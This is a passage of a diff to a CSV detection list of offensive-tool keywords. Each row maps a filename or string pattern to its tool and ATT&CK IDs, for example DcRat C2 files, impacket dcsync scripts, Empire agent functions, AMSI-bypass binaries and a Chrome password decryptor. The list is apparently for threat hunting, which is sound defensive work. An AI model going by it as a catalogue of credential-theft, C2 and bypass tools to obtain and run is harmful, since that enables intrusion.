TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*DCOMPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and 
SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*DCOMPotato-master*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*DCOMReflection.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" -"*DcRat 1.0.7*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*DcRat.7z*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*DcRat.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*DcRat.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*DcRat_png.png*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*DcRat-main.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat 1.0.7*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.7z*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*DcRat_png.png*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" 
+"*DcRat-main.zip*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*dcrypt_bartpe.zip*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*dcrypt_install.iss*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*dcrypt_setup_*.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" 
@@ -9159,11 +9307,11 @@
 "*dcsync_inject*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*dcsyncattack(*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
 "*dcsyncattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
-"*dcsyncattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*dcsyncattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
 "*dcsyncclient.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
 "*dcsyncclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
-"*dcsyncclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"*dd310c7a9d558083387ae42d137624df205051094b619f59edf7899af42104c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*dcsyncclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*dd310c7a9d558083387ae42d137624df205051094b619f59edf7899af42104c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
 "*DE7B9E6B-F73B-4573-A4C7-D314B528CFCB*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
 "*deb.torproject.org/torproject.org/*.asc*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*DebugAmsi.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z"
@@ -9173,31 +9321,31 @@ "*DebugAmsix64.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsix86.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*decoder-it/LocalPotato*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" -"*Decode-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Decode-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*decoy_document.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" -"*decrypt.py .\*.txt utf-16-le*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*decrypt.py .\*.txt utf-16-le*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" "*decrypt_chrome_password.py*","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","7","673","147","2023-10-02T18:22:13Z","2020-12-28T15:11:12Z" -"*Decrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Decrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*decrypt-chrome-passwords-main*","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","7","673","147","2023-10-02T18:22:13Z","2020-12-28T15:11:12Z" -"*Decrypt-CipherText*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*DecryptNextCharacterWinSCP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*decryptteamviewer*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 